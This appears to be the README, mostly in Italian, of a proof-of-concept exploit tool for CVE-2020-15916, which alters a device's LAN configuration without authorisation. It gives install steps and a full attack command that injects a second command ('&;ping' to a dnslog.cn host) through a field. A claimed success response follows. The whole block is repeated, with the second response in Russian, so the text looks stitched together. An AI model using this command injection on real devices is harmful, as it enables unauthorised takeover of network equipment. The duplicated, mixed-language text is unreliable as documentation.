
Questo progetto è una PoC per lo sfruttamento di CVE-2020-15916, una vulnerabilità che consente modifiche non autorizzate alla configurazione LAN di un dispositivo.
GenLANConfigAttack - è un PoC per lo sfruttamento di CVE-2020-15916, una vulnerabilità che consente di modificare senza autorizzazione la configurazione LAN di un dispositivo.
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: L'indirizzo IP del dispositivo di destinazione.ping_command: Comando da eseguire sul dispositivo di destinazione.session_password: Password per l'accesso alla sessione.python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[Response from 192.168.0.1]:
{"success":true,"message":"LAN IP configuration updated successfully"}
Questo PoC riguarda la vulnerabilità CVE-2020-15916, che consente agli attaccanti di alterare la configurazione LAN dei dispositivi vulnerabili sfruttando un debole meccanismo di autenticazione.
Questo strumento è fornito esclusivamente a scopo educativo. Usalo in modo responsabile e solo in ambienti in cui disponi di un'autorizzazione esplicita.
GenLANConfigAttack è un PoC per lo sfruttamento della vulnerabilità CVE-2020-15916, che consente di modificare senza autorizzazione la configurazione LAN del dispositivo.
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: L'indirizzo IP del dispositivo di destinazione.ping_command: Comando da eseguire sul dispositivo di destinazione.session_password: Password per l'accesso alla sessione.python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[Ответ от 192.168.0.1]:
{"success":true,"message":"Конфигурация LAN IP успешно обновлена"}
Questo PoC sfrutta la vulnerabilità CVE-2020-15916, che consente agli attaccanti di modificare la configurazione LAN sui dispositivi vulnerabili utilizzando un debole meccanismo di autenticazione.
Questo strumento è fornito esclusivamente a scopo educativo. Usalo in modo responsabile e solo in ambienti in cui disponi di un'autorizzazione esplicita.